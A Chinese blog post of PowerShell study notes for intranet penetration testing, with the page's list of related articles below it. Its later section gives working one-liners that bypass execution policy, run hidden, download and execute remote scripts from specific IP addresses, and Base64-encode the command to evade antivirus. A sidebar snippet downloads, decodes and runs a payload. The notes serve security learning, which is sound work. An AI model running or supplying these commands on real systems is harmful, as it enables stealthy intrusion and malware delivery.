内网学习——0x02 PowerShell

最新推荐文章于 2023-05-16 14:11:18 发布
最新推荐文章于 2023-05-16 14:11:18 发布
阅读量309 收藏 1
点赞数
分类专栏: 内网安全 网络安全 学习笔记 文章标签: poweshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45808483/article/details/122641599
版权

1、介绍

        PowerShell 可以简单的理解为 cmd 的高级版 cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。
        
        PowerShell 内置在 Windows 7 Windows Server 2008 R2 及更高版本的 Windows 系统中,同时 PowerShell 是构建在 .NET 平台上的所有命令传递的都是 .NET 对象。
PowerShell 有如下特点:
        Windows 7 以上的操作系统默认安装
        PowerShell 脚本可以运行在内存中,不需要写入磁盘
        可以从另一个系统中下载 PowerShell 脚本并执行
        目前很多工具都是基于 PowerShell 开发的
        很多安全软件检测不到 PowerShell 的活动
        cmd 通常会被阻止运行,但是 PowerShell 不会
        可以用来管理活动目录

 可输入 Get-Host 或者 $PSVersionTable 查看 PowerShell 版本:

 

Windows 操作系统对应的 PowerShell 版本信息:
1.0 windows server 2008
2.0 windows server 2008 r2 windows 7
3.0 windows server 2012 windows 8
4.0 windows server 2012 r2 windows 8.1
5.0 windows 10
5.1 windows server 2016

2、基本概念

ps1 文件

ps1 PowerShell 的脚本扩展名,一个 PowerShell 脚本文件其实就是一个简单的文本文件。

执行策略

为了防止恶意脚本在 PowerShell 中被运行, PowerShell 有个执行策略,默认情况下,这个执行策略是受限模式 Restricted
使用 Get-ExecutionPolicy 命令查看当前执行策略

执行策略有以下几种:
Restricted :不能运行脚本
RemoteSigned :本地创建的脚本可以运行,但从网上下载的脚本不能运行(除非它们拥有由受信任的发布者签署的数字签名)
AllSigned :仅当脚本由受信任的发布者签名才能运行。
Unrestricted :脚本执行不受限制,不管来自哪里,也不管它们是否有签名。
使用 Set-ExecutionPolicy <policy name> 设置执行策略,该命令需要管理员权限

运行脚本 

        PowerShell 运行脚本的方式和其他 shell 基本一致,可以输入完整路径运行,也可以到 ps1 文件所在目录下去运行,具体如下:

管道

PowerShell 中的管道类似linux中的管道,都是将前一个命令的输出作为另一个命令的输入,两个命令直接使用 "|" 进行连接。
列如,在PowerShell 中获取进程信息并以程序ID进行排序 
Get-Process | Sort-Object ID

 

3.一些命令

-NoLogo :启动不显示版权标志的 PowerShell
-WindowStyle Hidden (-W Hidden) :隐藏窗口
-NoProfile (-NoP) :不加载当前用户的配置文件
–Enc :执行 base64 编码后的 powershell 脚本字符串
-ExecutionPolicy Bypass (-Exec Bypass) :绕过执行安全策略
-Noexit :执行后不退出 Shell ,这在使用键盘记录等脚本时非常重要
-NonInteractive (-Nonl) :非交互模式, PowerShell 不为用户提供交互的提示
PowerShell 下,命令的命名规范很一致,都采用了动词 - 名词的形式,如 Net-Item ,动词一般为 Add New Get Remove Set 等。 PowerShell 还兼容 cmd Linux 命令,如查看目录可以使用 dir 或者 ls

文件操作类命令

新建目录 test New-Item test -ItemType directory
删除目录 test Remove-Item test
新建文件 test.txt New-Item test.txt -ItemType file
新建文件 test.txt ,内容为 hello New-Item test.txt -ItemType file -value "hello"
删除文件 test.txt Remove-Item test.txt
查看文件 test.txt 内容: Get-Content test.txt
设置文件 test.txt 内容 t Set-Content test.txt -Value "hello"
给文件 test.txt 追加内容: Add-Content test.txt -Value ",word!"
清除文件 test.txt 内容: Clear-Content test.txt

绕过本地权限并执行

上面说到了默认情况下 PowerShell 的执行策略是受限模式 Restricted ,这就导致了在渗透测试过程中我们需要采用一些方法绕过这个策略,从而执行我们的脚本文件。
先来看看默认受限模式下执行脚本的情况
 
这里系统会提示在此系统上禁止运行脚本,但加上 -ExecutionPolicy Bypass 即可绕过这个限制 
PowerShell.exe  -ExecutionPolicy Bypass -File .\powershell.ps1

绕过本地权限并隐藏执行

加入 -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile 即可隐藏执行。 
PowerShell.exe  -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -File .\powershell.ps1

下载远程脚本绕过权限并隐藏执行 

powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://123.56.82.231:8000/eryao7.ps1');
PowerShell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps
或者简写
PowerShell.exe -Exec Bypass -W Hidden -NoLogo -NonI -NoP "IEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')"

利用 Base64 对命令进行编码

使用 Base64 进行编码主要是为了混淆代码以避免被杀毒软件查杀,经过尝试这里直接使用 Base64 编码是不行的,可以使用 Github 上的一个编码工具,工具下载地址:https://raw.githubusercontent.com/darkoperator/powershell_scripts/master/ps_encoder.py

下载好后,需要先将要执行的命令保存到文本文件中,这里保存到了 tmp.txt 文本中,之后执行 python ps_encoder.py -s tmp.txt 即可  

>cat tmp.txtIEX(New-Object Net.WebClient).DownloadString('http://172.16.214.1:8000/t.ps1')>python ps_encoder.py -s tmp.txtSQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQA

使用 -Enc 指定Base64编码内容

PowerShell.exe -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALw

ErYao7
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
powershell错误总结
酒千殇的博客
04-16 2158
1.Connecting to remote server remoteAddress failed with the following error message : WinRM cannot complete the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and that a firewall exception for
PowerShell 图片转BASE64
Wagsn
03-03 625
【代码】PowerShell 图片转BASE64
powershell base64
如鹿渴慕泉水的专栏
01-27 2191
function ConvertTo-Base64($string) { $bytes = [System.Text.Encoding]::Unicode.GetBytes($string); $encoded = [System.Convert]::ToBase64String($bytes); return $encoded; } function ConvertFrom-Base64($string) { $bytes = [System.Convert]::Fr
Windows系统powershell运行指令常见报错及处理
weixin_56337147的博客
05-16 4673
powershell运行指令,包括在终端直接输入指令和运行.ps1文件,常出现的报错及处理。
内网渗透学习(二)
errorr0
03-28 2230
PowerShell的基本使用
POWERSHELL_内网渗透实例.pdf
08-07
目录 1.POWERSHELL简介 2.POWERSPLOIT 3.内网渗透实例
PowerShell启用winrm失败:拒绝访问 0x80070005 -2147024891
09-21
主要介绍了PowerShell启用winrm失败:拒绝访问 0x80070005 -2147024891,本文给出了详细的排查步骤和解决方法,需要的朋友可以参考下
PowerShell入门教程之快速学习PowerShell的几个方法
01-10
如何快速地掌握PowerShell呢?总的来说,就是要尽可能多的使用它,就像那句谚语说的:Practice makes perfect。当然这里还有一些原则和方法让我们可以遵循。 有效利用交互式环境  一般来说,PowerShell有两个主要的...
Windows powershell学习心得
01-05
1.PS介绍 2.PS基本指令及语法 3.PS管理计算机 4.PS与.NET API 5.PS与COM组件 6.PS与WMI
免杀学习(三)powershell
m0_62207170的博客
01-12 605
powershell免杀
PowerShell使用
weixin_44110913的博客
08-02 2095
目录 Windows PowerShell PowerShell的执行策略 绕过执行策略执行PowerShell脚本 PowerShell的常用文件类命令 PowerShell远程下载文件并执行 渗透测试常用的PowerShell命令 Powershell导入文件  Windows PowerShell Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在Windows7及其以上的系统...
powershell -enc参数无法解码base64编码payload的解决方案
weixin_30298497的博客
07-06 2578
powershell的-enc参数允许传入一个base64编码过的powershell脚本字符串作为参数来执行该powershell脚本,该方法常被用于绕过杀毒软件的主动防御机制。 今天下午在做一个后门程序时,通过在线base64编码网站编码的字符串竟然没法被powershell的-enc参数解析,解析时全是乱码,通过查找资料终于解决了这个问题 故将这个问题记录下来以备后续使用 方法引用自:...
Powershell学习笔记
来到了学渣的博客
10-16 4695
Powershell的优点 1、PowerShell可以用来管理活动目录 2、Windows7以上的操作系统默认安装 3、很多杀毒软件检测不到PowerShell的活动 4、可以从另外一个系统中下载PowerShell脚本并执行 5、cmd通常会被杀毒软件阻止运行,而PowerShell不会 6、PowerShell无须写到磁盘中,它可以直接在内存中运行。 Powershell的执行策略 Powershell有个安全策略,默认情况下,这个执行策略会被设置受限。 Get-ExecutionPolicy命令可
powershell base64 xor
lacoucou的专栏
05-21 653
下载解密执行一条龙: $b=$(New-Object Net.WebClient).DownloadString('hxxp://xxx.xx.xx/xx'); $d=[System.Convert]::FromBase64String($b); $t=New-Object Byte[]($d.Length); [int]$j=0; FOR([int]$i=0;$i -lt $d.Length; $i++) { $j+=66; $t[$i]=(($d[$i] -bxor ($i*3 -.
揭开PowerShell编码攻击的神秘面纱
iqifenxia的博客
01-02 665
     翻译:興趣使然的小胃   稿费:200RMB(不服你也来投稿啊!)   投稿方式:发送邮件至linwei#360,或登陆网页版在线投稿   一、前言   在过去的几年中,随着框架不断完善成熟,PowerShell也在不断获得人们的关注和欢迎,因此,在攻击行动中越来越多地看到PowerShell的身影也就不足为奇了。PowerShell为攻击者提供了系统各种原生功能支持,通过快速查看PowerShell恶意工具的泛滥形势,你可以对此类工具的增长态势有个整体了解。   微软对高版本..
powershell使用总结
热门推荐
Shanfenglan's blog
08-21 28万+
模块导入 Import-Module Recon Import-Module -name .\powerview.ps1 查看模块对应命令 Get-Command -Module name 其他 powershell.exe -ExecutionPolicy bypass -noprofile IEX(’’) 上述命令意思为 1、将执行策略设置为绕过,这样可以执行powershell脚本文件。 2、不加载配置文件 3、隐藏窗口 4、Iex命令为invove-expression的别名:接收一个字符串作
Powershell用于加密解密方法
日升东方
08-03 4222
#################  # Powershell Allows The Loading of .NET Assemblies  # Load the Security assembly to use with this script   #################  [Reflection.Assembly]::LoadWithPartialName("System.
一些值得收藏的PowerShell工具
月光轩辕的专栏
12-02 2856
转自http://www.freebuf.com/tools/87647.html 本文旨在分享部分PowerShell工具,仅供安全学习,禁止非法利用。 UnmanagedPowerShell :https://github.com/leechristensen/UnmanagedPowerShell 可以从一个非托管程序来执行PowerShell , 经过一些修改
windows内网渗透powershell
最新发布
10-14
在Windows内网渗透中,PowerShell是一个非常强大的工具,可以用于执行各种攻击和渗透技术。以下是一些常见的PowerShell攻击和渗透技术: 1. 使用PowerShell Empire进行横向移动和持久化 2. 使用PowerShell进行密码破解和凭证收集 3. 使用PowerShell进行端口转发和代理 如果要在内网中使用PowerShell进行渗透,可以使用以下步骤: 1. 获取目标系统的管理员权限 2. 下载和安装PowerShell Empire或其他PowerShell攻击工具 3. 使用PowerShell Empire或其他工具进行横向移动和持久化 4. 使用PowerShell进行密码破解和凭证收集 5. 使用PowerShell进行端口转发和代理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ErYao7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值